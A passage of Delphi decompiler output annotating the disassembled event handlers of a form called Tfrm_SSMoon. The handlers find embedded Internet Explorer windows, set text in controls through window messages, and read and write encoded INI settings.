* Reference to: user32.SendMessageA()
|
004BBB4A E8A1C9F4FF call 004084F0
004BBB4F 33C0 xor eax, eax
004BBB51 8945F0 mov [ebp-$10], eax
004BBB54 E90E010000 jmp 004BBC67
* Possible String Reference to: '15063185'
|
004BBB59 B8D8BC4B00 mov eax, $004BBCD8
004BBB5E 8B55F8 mov edx, [ebp-$08]
|
004BBB61 E86A9FF4FF call 00405AD0
004BBB66 85C0 test eax, eax
004BBB68 7E63 jle 004BBBCD
004BBB6A 0FB605CCBC4B00 movzx eax, byte ptr [$004BBCCC]
004BBB71 50 push eax
004BBB72 8D85DCFEFFFF lea eax, [ebp+$FFFFFEDC]
004BBB78 50 push eax
* Possible String Reference to: '15270722'
|
004BBB79 B9C0BC4B00 mov ecx, $004BBCC0
* Possible String Reference to: '15063185'
|
004BBB7E BAD8BC4B00 mov edx, $004BBCD8
004BBB83 8B45F8 mov eax, [ebp-$08]
|
004BBB86 E8253DF5FF call 0040F8B0
004BBB8B 8B95DCFEFFFF mov edx, [ebp+$FFFFFEDC]
004BBB91 8D45F8 lea eax, [ebp-$08]
|
004BBB94 E8F399F4FF call 0040558C
004BBB99 6A00 push $00
004BBB9B 6A00 push $00
004BBB9D 6A07 push $07
004BBB9F 8B4508 mov eax, [ebp+$08]
004BBBA2 50 push eax
* Reference to: user32.SendMessageA()
|
004BBBA3 E848C9F4FF call 004084F0
004BBBA8 8B55F8 mov edx, [ebp-$08]
004BBBAB 8BC2 mov eax, edx
004BBBAD 85C0 test eax, eax
004BBBAF 7405 jz 004BBBB6
004BBBB1 83E804 sub eax, +$04
004BBBB4 8B00 mov eax, [eax]
004BBBB6 52 push edx
004BBBB7 50 push eax
004BBBB8 6A0C push $0C
004BBBBA 8B4508 mov eax, [ebp+$08]
004BBBBD 50 push eax
* Reference to: user32.SendMessageA()
|
004BBBBE E82DC9F4FF call 004084F0
004BBBC3 33C0 xor eax, eax
004BBBC5 8945F0 mov [ebp-$10], eax
004BBBC8 E99A000000 jmp 004BBC67
* Possible String Reference to: '15063185'
|
004BBBCD B8D8BC4B00 mov eax, $004BBCD8
004BBBD2 8B55F8 mov edx, [ebp-$08]
|
004BBBD5 E8F69EF4FF call 00405AD0
004BBBDA 85C0 test eax, eax
004BBBDC 7E60 jle 004BBC3E
004BBBDE 0FB605CCBC4B00 movzx eax, byte ptr [$004BBCCC]
004BBBE5 50 push eax
004BBBE6 8D85D8FEFFFF lea eax, [ebp+$FFFFFED8]
004BBBEC 50 push eax
* Possible String Reference to: '15270722'
|
004BBBED B9C0BC4B00 mov ecx, $004BBCC0
* Possible String Reference to: '15063185'
|
004BBBF2 BAD8BC4B00 mov edx, $004BBCD8
004BBBF7 8B45F8 mov eax, [ebp-$08]
|
004BBBFA E8B13CF5FF call 0040F8B0
004BBBFF 8B95D8FEFFFF mov edx, [ebp+$FFFFFED8]
004BBC05 8D45F8 lea eax, [ebp-$08]
|
004BBC08 E87F99F4FF call 0040558C
004BBC0D 6A00 push $00
004BBC0F 6A00 push $00
004BBC11 6A07 push $07
004BBC13 8B4508 mov eax, [ebp+$08]
004BBC16 50 push eax
* Reference to: user32.SendMessageA()
|
004BBC17 E8D4C8F4FF call 004084F0
004BBC1C 8B55F8 mov edx, [ebp-$08]
004BBC1F 8BC2 mov eax, edx
004BBC21 85C0 test eax, eax
004BBC23 7405 jz 004BBC2A
004BBC25 83E804 sub eax, +$04
004BBC28 8B00 mov eax, [eax]
004BBC2A 52 push edx
004BBC2B 50 push eax
004BBC2C 6A0C push $0C
004BBC2E 8B4508 mov eax, [ebp+$08]
004BBC31 50 push eax
* Reference to: user32.SendMessageA()
|
004BBC32 E8B9C8F4FF call 004084F0
004BBC37 33C0 xor eax, eax
004BBC39 8945F0 mov [ebp-$10], eax
004BBC3C EB29 jmp 004BBC67
004BBC3E 8B45FC mov eax, [ebp-$04]
* Possible String Reference to: 'Internet Explorer_Server'
|
004BBC41 BAECBC4B00 mov edx, $004BBCEC
|
004BBC46 E8D19CF4FF call 0040591C
004BBC4B 751A jnz 004BBC67
004BBC4D 8B4508 mov eax, [ebp+$08]
004BBC50 50 push eax
* Reference to: user32.IsWindowVisible()
|
004BBC51 E8AAC7F4FF call 00408400
004BBC56 85C0 test eax, eax
004BBC58 740D jz 004BBC67
004BBC5A 33C0 xor eax, eax
004BBC5C 8945F0 mov [ebp-$10], eax
004BBC5F 8B4508 mov eax, [ebp+$08]
|
004BBC62 E83DF9FFFF call 004BB5A4
004BBC67 33C0 xor eax, eax
004BBC69 5A pop edx
004BBC6A 59 pop ecx
004BBC6B 59 pop ecx
004BBC6C 648910 mov fs:[eax], edx
****** FINALLY
|
004BBC6F 6899BC4B00 push $004BBC99
004BBC74 8D85D8FEFFFF lea eax, [ebp+$FFFFFED8]
004BBC7A BA06000000 mov edx, $00000006
|
004BBC7F E89498F4FF call 00405518
004BBC84 8D45F4 lea eax, [ebp-$0C]
004BBC87 BA03000000 mov edx, $00000003
|
004BBC8C E88798F4FF call 00405518
004BBC91 C3 ret
|
004BBC92 E94590F4FF jmp 00404CDC
004BBC97 EBDB jmp 004BBC74
****** END
|
004BBC99 8B45F0 mov eax, [ebp-$10]
004BBC9C 5F pop edi
004BBC9D 5E pop esi
004BBC9E 5B pop ebx
004BBC9F 8BE5 mov esp, ebp
004BBCA1 5D pop ebp
004BBCA2 C20400 ret $0004
*)
end;
procedure Tfrm_SSMoon._PROC_004BBD09(Sender : TObject);
begin
(*
004BBD09 8BEC mov ebp, esp
004BBD0B 83C4E0 add esp, -$20
004BBD0E 53 push ebx
004BBD0F 56 push esi
004BBD10 57 push edi
004BBD11 A158674C00 mov eax, dword ptr [$004C6758]
004BBD16 C60001 mov byte ptr [eax], $01
004BBD19 33C9 xor ecx, ecx
004BBD1B 55 push ebp
* Possible String Reference to: '閅岕鑔愻gL'
|
004BBD1C 68CABD4B00 push $004BBDCA
***** TRY
|
004BBD21 64FF31 push dword ptr fs:[ecx]
004BBD24 648921 mov fs:[ecx], esp
004BBD27 A100634C00 mov eax, dword ptr [$004C6300]
004BBD2C 833801 cmp dword ptr [eax], +$01
004BBD2F 7571 jnz 004BBDA2
004BBD31 8D45F8 lea eax, [ebp-$08]
004BBD34 50 push eax
* Reference to: user32.GetCursorPos()
|
004BBD35 E8EEC4F4FF call 00408228
004BBD3A 8D45E0 lea eax, [ebp-$20]
004BBD3D 50 push eax
* Reference to: user32.GetForegroundWindow()
|
004BBD3E E815C5F4FF call 00408258
004BBD43 50 push eax
* Reference to: user32.GetWindowRect()
|
004BBD44 E81FC6F4FF call 00408368
004BBD49 8B55E8 mov edx, [ebp-$18]
004BBD4C 8B45E0 mov eax, [ebp-$20]
004BBD4F 2BD0 sub edx, eax
004BBD51 D1FA sar edx, 1
004BBD53 7903 jns 004BBD58
004BBD55 83D200 adc edx, +$00
004BBD58 03D0 add edx, eax
004BBD5A 8955F0 mov [ebp-$10], edx
004BBD5D 8B55EC mov edx, [ebp-$14]
004BBD60 8B45E4 mov eax, [ebp-$1C]
004BBD63 2BD0 sub edx, eax
004BBD65 D1FA sar edx, 1
004BBD67 7903 jns 004BBD6C
004BBD69 83D200 adc edx, +$00
004BBD6C 03D0 add edx, eax
004BBD6E 8955F4 mov [ebp-$0C], edx
004BBD71 52 push edx
004BBD72 8B45F0 mov eax, [ebp-$10]
004BBD75 50 push eax
* Reference to: user32.SetCursorPos()
|
004BBD76 E8BDC7F4FF call 00408538
004BBD7B FF75F4 push dword ptr [ebp-$0C]
004BBD7E FF75F0 push dword ptr [ebp-$10]
* Reference to: user32.WindowFromPoint()
|
004BBD81 E8AAC8F4FF call 00408630
004BBD86 8BD8 mov ebx, eax
004BBD88 8B45FC mov eax, [ebp-$04]
004BBD8B 50 push eax
004BBD8C 8B45F8 mov eax, [ebp-$08]
004BBD8F 50 push eax
* Reference to: user32.SetCursorPos()
|
004BBD90 E8A3C7F4FF call 00408538
004BBD95 85DB test ebx, ebx
004BBD97 7427 jz 004BBDC0
004BBD99 8BC3 mov eax, ebx
|
004BBD9B E804F8FFFF call 004BB5A4
004BBDA0 EB1E jmp 004BBDC0
004BBDA2 A100634C00 mov eax, dword ptr [$004C6300]
004BBDA7 833800 cmp dword ptr [eax], +$00
004BBDAA 7514 jnz 004BBDC0
004BBDAC 6A00 push $00
* Possible String Reference to: 'U嬱伳佝SVW3缐呚?墔荥墔帼墔?
| ?墔棹墔忐塃鼔E鴫E?繳h捈K'
|
004BBDAE 6800B84B00 push $004BB800
004BBDB3 A160624C00 mov eax, dword ptr [$004C6260]
004BBDB8 8B00 mov eax, [eax]
004BBDBA 50 push eax
* Reference to: user32.EnumChildWindows()
|
004BBDBB E8D8C3F4FF call 00408198
004BBDC0 33C0 xor eax, eax
004BBDC2 5A pop edx
004BBDC3 59 pop ecx
004BBDC4 59 pop ecx
004BBDC5 648910 mov fs:[eax], edx
004BBDC8 EB0A jmp 004BBDD4
|
004BBDCA E9598CF4FF jmp 00404A28
|
004BBDCF E86490F4FF call 00404E38
****** END
|
004BBDD4 A158674C00 mov eax, dword ptr [$004C6758]
004BBDD9 C60000 mov byte ptr [eax], $00
004BBDDC 5F pop edi
004BBDDD 5E pop esi
004BBDDE 5B pop ebx
004BBDDF 8BE5 mov esp, ebp
004BBDE1 5D pop ebp
004BBDE2 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BBDE4(Sender : TObject);
begin
(*
004BBDE4 A12C664C00 mov eax, dword ptr [$004C662C]
004BBDE9 8B00 mov eax, [eax]
|
004BBDEB E8ACA6FAFF call 0046649C
004BBDF0 B954DD4C00 mov ecx, $004CDD54
004BBDF5 A12C664C00 mov eax, dword ptr [$004C662C]
004BBDFA 8B00 mov eax, [eax]
* Reference to class Tfrm_SSMoon
|
004BBDFC 8B15B0A44B00 mov edx, [$004BA4B0]
|
004BBE02 E8ADA6FAFF call 004664B4
004BBE07 A154DD4C00 mov eax, dword ptr [$004CDD54]
* Reference to : TGlassFrame._PROC_004627DC()
|
004BBE0C E8CB69FAFF call 004627DC
004BBE11 A12C664C00 mov eax, dword ptr [$004C662C]
004BBE16 8B00 mov eax, [eax]
|
004BBE18 E8CFA7FAFF call 004665EC
004BBE1D C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BC071(Sender : TObject);
begin
(*
004BC071 8BEC mov ebp, esp
004BC073 B92A000000 mov ecx, $0000002A
004BC078 6A00 push $00
004BC07A 6A00 push $00
004BC07C 49 dec ecx
004BC07D 75F9 jnz 004BC078
004BC07F 51 push ecx
004BC080 53 push ebx
004BC081 56 push esi
004BC082 57 push edi
004BC083 8BD8 mov ebx, eax
004BC085 33C0 xor eax, eax
004BC087 55 push ebp
* Possible String Reference to: '镺圁豚_^[嬪]?
|
004BC088 6888C54B00 push $004BC588
***** TRY
|
004BC08D 64FF30 push dword ptr fs:[eax]
004BC090 648920 mov fs:[eax], esp
004BC093 8D85F4FEFFFF lea eax, [ebp+$FFFFFEF4]
* Reference to : TWebBrowser._PROC_00470A04()
|
004BC099 E86649FBFF call 00470A04
004BC09E 8B85F4FEFFFF mov eax, [ebp+$FFFFFEF4]
004BC0A4 8D95F8FEFFFF lea edx, [ebp+$FFFFFEF8]
|
004BC0AA E881E8F4FF call 0040A930
004BC0AF 8B85F8FEFFFF mov eax, [ebp+$FFFFFEF8]
004BC0B5 8D55FC lea edx, [ebp-$04]
|
004BC0B8 E8534BFBFF call 00470C10
004BC0BD A1E4664C00 mov eax, dword ptr [$004C66E4]
|
004BC0C2 E82D94F4FF call 004054F4
004BC0C7 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
004BC0CD 33C9 xor ecx, ecx
004BC0CF BA00010000 mov edx, $00000100
|
004BC0D4 E85F79F4FF call 00403A38
004BC0D9 8B45FC mov eax, [ebp-$04]
|
004BC0DC E8A398F4FF call 00405984
004BC0E1 8BF0 mov esi, eax
004BC0E3 56 push esi
004BC0E4 6800010000 push $00000100
004BC0E9 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
004BC0EF 50 push eax
004BC0F0 6898C54B00 push $004BC598
* Possible String Reference to: 'CD1'
|
004BC0F5 689CC54B00 push $004BC59C
* Possible String Reference to: 'DBI'
|
004BC0FA 68A0C54B00 push $004BC5A0
* Reference to: kernel32.GetPrivateProfileStringA()
|
004BC0FF E88CBBF4FF call 00407C90
004BC104 8D95F0FEFFFF lea edx, [ebp+$FFFFFEF0]
004BC10A 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
|
004BC110 E83BECF4FF call 0040AD50
004BC115 8B95F0FEFFFF mov edx, [ebp+$FFFFFEF0]
004BC11B A1E4664C00 mov eax, dword ptr [$004C66E4]
|
004BC120 E82394F4FF call 00405548
004BC125 A1E4664C00 mov eax, dword ptr [$004C66E4]
004BC12A 833800 cmp dword ptr [eax], +$00
004BC12D 7571 jnz 004BC1A0
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC12F 8B8388030000 mov eax, [ebx+$0388]
004BC135 8B4020 mov eax, [eax+$20]
004BC138 8B10 mov edx, [eax]
004BC13A FF5214 call dword ptr [edx+$14]
|
004BC13D E8C272F4FF call 00403404
004BC142 8BD0 mov edx, eax
004BC144 8D8DECFEFFFF lea ecx, [ebp+$FFFFFEEC]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC14A 8B8388030000 mov eax, [ebx+$0388]
004BC150 8B4020 mov eax, [eax+$20]
004BC153 8B38 mov edi, [eax]
004BC155 FF570C call dword ptr [edi+$0C]
004BC158 8B95ECFEFFFF mov edx, [ebp+$FFFFFEEC]
004BC15E A1E4664C00 mov eax, dword ptr [$004C66E4]
|
004BC163 E8E093F4FF call 00405548
004BC168 56 push esi
004BC169 8D8DE8FEFFFF lea ecx, [ebp+$FFFFFEE8]
004BC16F A1E4664C00 mov eax, dword ptr [$004C66E4]
004BC174 8B00 mov eax, [eax]
* Possible String Reference to: 'B85609AEF9C6'
|
004BC176 BAACC54B00 mov edx, $004BC5AC
|
004BC17B E8DC57FBFF call 0047195C
004BC180 8B85E8FEFFFF mov eax, [ebp+$FFFFFEE8]
|
004BC186 E8F997F4FF call 00405984
004BC18B 50 push eax
* Possible String Reference to: 'CD1'
|
004BC18C 689CC54B00 push $004BC59C
* Possible String Reference to: 'DBI'
|
004BC191 68A0C54B00 push $004BC5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BC196 E865BCF4FF call 00407E00
004BC19B E9B0000000 jmp 004BC250
004BC1A0 8D8DE4FEFFFF lea ecx, [ebp+$FFFFFEE4]
004BC1A6 A1E4664C00 mov eax, dword ptr [$004C66E4]
004BC1AB 8B00 mov eax, [eax]
004BC1AD 50 push eax
* Possible String Reference to: 'B85609AEF9C6'
|
004BC1AE BAACC54B00 mov edx, $004BC5AC
004BC1B3 58 pop eax
|
004BC1B4 E88759FBFF call 00471B40
004BC1B9 8B95E4FEFFFF mov edx, [ebp+$FFFFFEE4]
004BC1BF A1E4664C00 mov eax, dword ptr [$004C66E4]
|
004BC1C4 E87F93F4FF call 00405548
004BC1C9 8B15E4664C00 mov edx, [$004C66E4]
004BC1CF 8B12 mov edx, [edx]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC1D1 8B8388030000 mov eax, [ebx+$0388]
004BC1D7 8B4020 mov eax, [eax+$20]
004BC1DA 8B08 mov ecx, [eax]
004BC1DC FF5154 call dword ptr [ecx+$54]
004BC1DF 40 inc eax
004BC1E0 756E jnz 004BC250
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC1E2 8B8388030000 mov eax, [ebx+$0388]
004BC1E8 8B4020 mov eax, [eax+$20]
004BC1EB 8B10 mov edx, [eax]
004BC1ED FF5214 call dword ptr [edx+$14]
|
004BC1F0 E80F72F4FF call 00403404
004BC1F5 8BD0 mov edx, eax
004BC1F7 8D8DE0FEFFFF lea ecx, [ebp+$FFFFFEE0]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC1FD 8B8388030000 mov eax, [ebx+$0388]
004BC203 8B4020 mov eax, [eax+$20]
004BC206 8B38 mov edi, [eax]
004BC208 FF570C call dword ptr [edi+$0C]
004BC20B 8B95E0FEFFFF mov edx, [ebp+$FFFFFEE0]
004BC211 A1E4664C00 mov eax, dword ptr [$004C66E4]
|
004BC216 E82D93F4FF call 00405548
004BC21B 56 push esi
004BC21C 8D8DDCFEFFFF lea ecx, [ebp+$FFFFFEDC]
004BC222 A1E4664C00 mov eax, dword ptr [$004C66E4]
004BC227 8B00 mov eax, [eax]
004BC229 50 push eax
* Possible String Reference to: 'B85609AEF9C6'
|
004BC22A BAACC54B00 mov edx, $004BC5AC
004BC22F 58 pop eax
|
004BC230 E82757FBFF call 0047195C
004BC235 8B85DCFEFFFF mov eax, [ebp+$FFFFFEDC]
|
004BC23B E84497F4FF call 00405984
004BC240 50 push eax
* Possible String Reference to: 'CD1'
|
004BC241 689CC54B00 push $004BC59C
* Possible String Reference to: 'DBI'
|
004BC246 68A0C54B00 push $004BC5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BC24B E8B0BBF4FF call 00407E00
004BC250 A110644C00 mov eax, dword ptr [$004C6410]
|
004BC255 E89A92F4FF call 004054F4
004BC25A 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
004BC260 33C9 xor ecx, ecx
004BC262 BA00010000 mov edx, $00000100
|
004BC267 E8CC77F4FF call 00403A38
004BC26C 56 push esi
004BC26D 6800010000 push $00000100
004BC272 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
004BC278 50 push eax
004BC279 6898C54B00 push $004BC598
* Possible String Reference to: 'CD2'
|
004BC27E 68BCC54B00 push $004BC5BC
* Possible String Reference to: 'DBI'
|
004BC283 68A0C54B00 push $004BC5A0
* Reference to: kernel32.GetPrivateProfileStringA()
|
004BC288 E803BAF4FF call 00407C90
004BC28D 8D95D8FEFFFF lea edx, [ebp+$FFFFFED8]
004BC293 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
|
004BC299 E8B2EAF4FF call 0040AD50
004BC29E 8B95D8FEFFFF mov edx, [ebp+$FFFFFED8]
004BC2A4 A110644C00 mov eax, dword ptr [$004C6410]
|
004BC2A9 E89A92F4FF call 00405548
004BC2AE A110644C00 mov eax, dword ptr [$004C6410]
004BC2B3 833800 cmp dword ptr [eax], +$00
004BC2B6 7573 jnz 004BC32B
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC2B8 8B8388030000 mov eax, [ebx+$0388]
004BC2BE 8B4018 mov eax, [eax+$18]
004BC2C1 8B10 mov edx, [eax]
004BC2C3 FF5214 call dword ptr [edx+$14]
|
004BC2C6 E83971F4FF call 00403404
004BC2CB 8BD0 mov edx, eax
004BC2CD 8D8DD4FEFFFF lea ecx, [ebp+$FFFFFED4]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC2D3 8B8388030000 mov eax, [ebx+$0388]
004BC2D9 8B4018 mov eax, [eax+$18]
004BC2DC 8B38 mov edi, [eax]
004BC2DE FF570C call dword ptr [edi+$0C]
004BC2E1 8B95D4FEFFFF mov edx, [ebp+$FFFFFED4]
004BC2E7 A110644C00 mov eax, dword ptr [$004C6410]
|
004BC2EC E85792F4FF call 00405548
004BC2F1 56 push esi
004BC2F2 8D8DD0FEFFFF lea ecx, [ebp+$FFFFFED0]
004BC2F8 A110644C00 mov eax, dword ptr [$004C6410]
004BC2FD 8B00 mov eax, [eax]
004BC2FF 50 push eax
* Possible String Reference to: 'B85609AEF9C6'
|
004BC300 BAACC54B00 mov edx, $004BC5AC
004BC305 58 pop eax
|
004BC306 E85156FBFF call 0047195C
004BC30B 8B85D0FEFFFF mov eax, [ebp+$FFFFFED0]
|
004BC311 E86E96F4FF call 00405984
004BC316 50 push eax
* Possible String Reference to: 'CD2'
|
004BC317 68BCC54B00 push $004BC5BC
* Possible String Reference to: 'DBI'
|
004BC31C 68A0C54B00 push $004BC5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BC321 E8DABAF4FF call 00407E00
004BC326 E9B0000000 jmp 004BC3DB
004BC32B 8D8DCCFEFFFF lea ecx, [ebp+$FFFFFECC]
004BC331 A110644C00 mov eax, dword ptr [$004C6410]
004BC336 8B00 mov eax, [eax]
004BC338 50 push eax
* Possible String Reference to: 'B85609AEF9C6'
|
004BC339 BAACC54B00 mov edx, $004BC5AC
004BC33E 58 pop eax
|
004BC33F E8FC57FBFF call 00471B40
004BC344 8B95CCFEFFFF mov edx, [ebp+$FFFFFECC]
004BC34A A110644C00 mov eax, dword ptr [$004C6410]
|
004BC34F E8F491F4FF call 00405548
004BC354 8B1510644C00 mov edx, [$004C6410]
004BC35A 8B12 mov edx, [edx]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC35C 8B8388030000 mov eax, [ebx+$0388]
004BC362 8B4018 mov eax, [eax+$18]
004BC365 8B08 mov ecx, [eax]
004BC367 FF5154 call dword ptr [ecx+$54]
004BC36A 40 inc eax
004BC36B 756E jnz 004BC3DB
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC36D 8B8388030000 mov eax, [ebx+$0388]
004BC373 8B4018 mov eax, [eax+$18]
004BC376 8B10 mov edx, [eax]
004BC378 FF5214 call dword ptr [edx+$14]
|
004BC37B E88470F4FF call 00403404
004BC380 8BD0 mov edx, eax
004BC382 8D8DC8FEFFFF lea ecx, [ebp+$FFFFFEC8]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC388 8B8388030000 mov eax, [ebx+$0388]
004BC38E 8B4018 mov eax, [eax+$18]
004BC391 8B38 mov edi, [eax]
004BC393 FF570C call dword ptr [edi+$0C]
004BC396 8B95C8FEFFFF mov edx, [ebp+$FFFFFEC8]
004BC39C A110644C00 mov eax, dword ptr [$004C6410]
|
004BC3A1 E8A291F4FF call 00405548
004BC3A6 56 push esi
004BC3A7 8D8DC4FEFFFF lea ecx, [ebp+$FFFFFEC4]
004BC3AD A110644C00 mov eax, dword ptr [$004C6410]
004BC3B2 8B00 mov eax, [eax]
004BC3B4 50 push eax
* Possible String Reference to: 'B85609AEF9C6'
|
004BC3B5 BAACC54B00 mov edx, $004BC5AC
004BC3BA 58 pop eax
|
004BC3BB E89C55FBFF call 0047195C
004BC3C0 8B85C4FEFFFF mov eax, [ebp+$FFFFFEC4]
|
004BC3C6 E8B995F4FF call 00405984
004BC3CB 50 push eax
* Possible String Reference to: 'CD2'
|
004BC3CC 68BCC54B00 push $004BC5BC
* Possible String Reference to: 'DBI'
|
004BC3D1 68A0C54B00 push $004BC5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BC3D6 E825BAF4FF call 00407E00
004BC3DB A138664C00 mov eax, dword ptr [$004C6638]
|
004BC3E0 E80F91F4FF call 004054F4
004BC3E5 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
004BC3EB 33C9 xor ecx, ecx
004BC3ED BA00010000 mov edx, $00000100
|
004BC3F2 E84176F4FF call 00403A38
004BC3F7 56 push esi
004BC3F8 6800010000 push $00000100
004BC3FD 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
004BC403 50 push eax
004BC404 6898C54B00 push $004BC598
* Possible String Reference to: 'CD3'
|
004BC409 68C0C54B00 push $004BC5C0
* Possible String Reference to: 'DBI'
|
004BC40E 68A0C54B00 push $004BC5A0
* Reference to: kernel32.GetPrivateProfileStringA()
|
004BC413 E878B8F4FF call 00407C90
004BC418 8D95C0FEFFFF lea edx, [ebp+$FFFFFEC0]
004BC41E 8D85FCFEFFFF lea eax, [ebp+$FFFFFEFC]
|
004BC424 E827E9F4FF call 0040AD50
004BC429 8B95C0FEFFFF mov edx, [ebp+$FFFFFEC0]
004BC42F A138664C00 mov eax, dword ptr [$004C6638]
|
004BC434 E80F91F4FF call 00405548
004BC439 A138664C00 mov eax, dword ptr [$004C6638]
004BC43E 833800 cmp dword ptr [eax], +$00
004BC441 7571 jnz 004BC4B4
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC443 8B8388030000 mov eax, [ebx+$0388]
004BC449 8B401C mov eax, [eax+$1C]
004BC44C 8B10 mov edx, [eax]
004BC44E FF5214 call dword ptr [edx+$14]
|
004BC451 E8AE6FF4FF call 00403404
004BC456 8BD0 mov edx, eax
004BC458 8D8DBCFEFFFF lea ecx, [ebp+$FFFFFEBC]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BC45E 8B8388030000 mov eax, [ebx+$0388]
004BC464 8B401C mov eax, [eax+$1C]
004BC467 8B18 mov ebx, [eax]
004BC469 FF530C call dword ptr [ebx+$0C]
004BC46C 8B95BCFEFFFF mov edx, [ebp+$FFFFFEBC]
004BC472 A138664C00 mov eax, dword ptr [$004C6638]
|
004BC477 E8CC90F4FF call 00405548
004BC47C 56 push esi
004BC47D 8D8DB8FEFFFF lea ecx, [ebp+$FFFFFEB8]
004BC483 A138664C00 mov eax, dword ptr [$004C6638]
004BC488 8B00 mov eax, [eax]
* Possible String Reference to: 'B85609AEF9C6'
|
004BC48A BAACC54B00 mov edx, $004BC5AC
|
004BC48F E8C854FBFF call 0047195C
004BC494 8B85B8FEFFFF mov eax, [ebp+$FFFFFEB8]
|
004BC49A E8E594F4FF call 00405984
004BC49F 50 push eax
* Possible String Reference to: 'CD3'
|
004BC4A0 68C0C54B00 push $004BC5C0
* Possible String Reference to: 'DBI'
|
004BC4A5 68A0C54B00 push $004BC5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BC4AA E851B9F4FF call 00407E00
004BC4AF E9AE000000 jmp 004BC562
004BC4B4 8D8DB4FEFFFF lea ecx, [ebp+$FFFFFEB4]
004BC4BA A138664C00 mov eax, dword ptr [$004C6638]
004BC4BF 8B00 mov eax, [eax]
004BC4C1 50 push eax
* Possible String Reference to: 'B85609AEF9C6'
|
004BC4C2 BAACC54B00 mov edx, $004BC5AC
004BC4C7 58 pop eax
|
004BC4C8 E87356FBFF call 00471B40
004BC4CD 8B95B4FEFFFF mov edx, [ebp+$FFFFFEB4]
004BC4D3 A138664C00 mov eax, dword ptr [$004C6638]
|
004BC4D8 E86B90F4FF call 00405548
004BC4DD 8B1538664C00 mov edx, [$004C6638]
004BC4E3 8B12 mov edx, [edx]
004BC4E5 8B8388030000 mov eax, [ebx+$0388]
004BC4EB 8B401C mov eax, [eax+$1C]
004BC4EE 8B08 mov ecx, [eax]
004BC4F0 FF5154 call dword ptr [ecx+$54]
004BC4F3 40 inc eax
004BC4F4 756C jnz 004BC562
004BC4F6 8B8388030000 mov eax, [ebx+$0388]
004BC4FC 8B401C mov eax, [eax+$1C]
004BC4FF 8B10 mov edx, [eax]
004BC501 FF5214 call dword ptr [edx+$14]
|
004BC504 E8FB6EF4FF call 00403404
004BC509 8BD0 mov edx, eax
004BC50B 8D8DB0FEFFFF lea ecx, [ebp+$FFFFFEB0]
004BC511 8B8388030000 mov eax, [ebx+$0388]
004BC517 8B401C mov eax, [eax+$1C]
004BC51A 8B18 mov ebx, [eax]
004BC51C FF530C call dword ptr [ebx+$0C]
004BC51F 8B95B0FEFFFF mov edx, [ebp+$FFFFFEB0]
004BC525 A138664C00 mov eax, dword ptr [$004C6638]
|
004BC52A E81990F4FF call 00405548
004BC52F 56 push esi
004BC530 8D8DACFEFFFF lea ecx, [ebp+$FFFFFEAC]
004BC536 A138664C00 mov eax, dword ptr [$004C6638]
004BC53B 8B00 mov eax, [eax]
* Possible String Reference to: 'B85609AEF9C6'
|
004BC53D BAACC54B00 mov edx, $004BC5AC
|
004BC542 E81554FBFF call 0047195C
004BC547 8B85ACFEFFFF mov eax, [ebp+$FFFFFEAC]
|
004BC54D E83294F4FF call 00405984
004BC552 50 push eax
* Possible String Reference to: 'CD3'
|
004BC553 68C0C54B00 push $004BC5C0
* Possible String Reference to: 'DBI'
|
004BC558 68A0C54B00 push $004BC5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BC55D E89EB8F4FF call 00407E00
004BC562 33C0 xor eax, eax
004BC564 5A pop edx
004BC565 59 pop ecx
004BC566 59 pop ecx
004BC567 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '_^[嬪]?
|
004BC56A 688FC54B00 push $004BC58F
004BC56F 8D85ACFEFFFF lea eax, [ebp+$FFFFFEAC]
004BC575 BA14000000 mov edx, $00000014
|
004BC57A E8998FF4FF call 00405518
004BC57F 8D45FC lea eax, [ebp-$04]
|
004BC582 E86D8FF4FF call 004054F4
004BC587 C3 ret
|
004BC588 E94F87F4FF jmp 00404CDC
004BC58D EBE0 jmp 004BC56F
****** END
|
004BC58F 5F pop edi
004BC590 5E pop esi
004BC591 5B pop ebx
004BC592 8BE5 mov esp, ebp
004BC594 5D pop ebp
004BC595 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BC5C5(Sender : TObject);
begin
(*
004BC5C5 8BEC mov ebp, esp
004BC5C7 6A00 push $00
004BC5C9 6A00 push $00
004BC5CB 6A00 push $00
004BC5CD 53 push ebx
004BC5CE 8BD8 mov ebx, eax
004BC5D0 33C0 xor eax, eax
004BC5D2 55 push ebp
* Possible String Reference to: '閽嗶脬[嬪]?
|
004BC5D3 6845C64B00 push $004BC645
***** TRY
|
004BC5D8 64FF30 push dword ptr fs:[eax]
004BC5DB 648920 mov fs:[eax], esp
004BC5DE 8D45FC lea eax, [ebp-$04]
* Possible String Reference to: 'about:blank'
|
004BC5E1 BA5CC64B00 mov edx, $004BC65C
|
004BC5E6 E8A18FF4FF call 0040558C
004BC5EB 8D45F8 lea eax, [ebp-$08]
004BC5EE 8B55FC mov edx, [ebp-$04]
|
004BC5F1 E86698F4FF call 00405E5C
004BC5F6 8B55F8 mov edx, [ebp-$08]
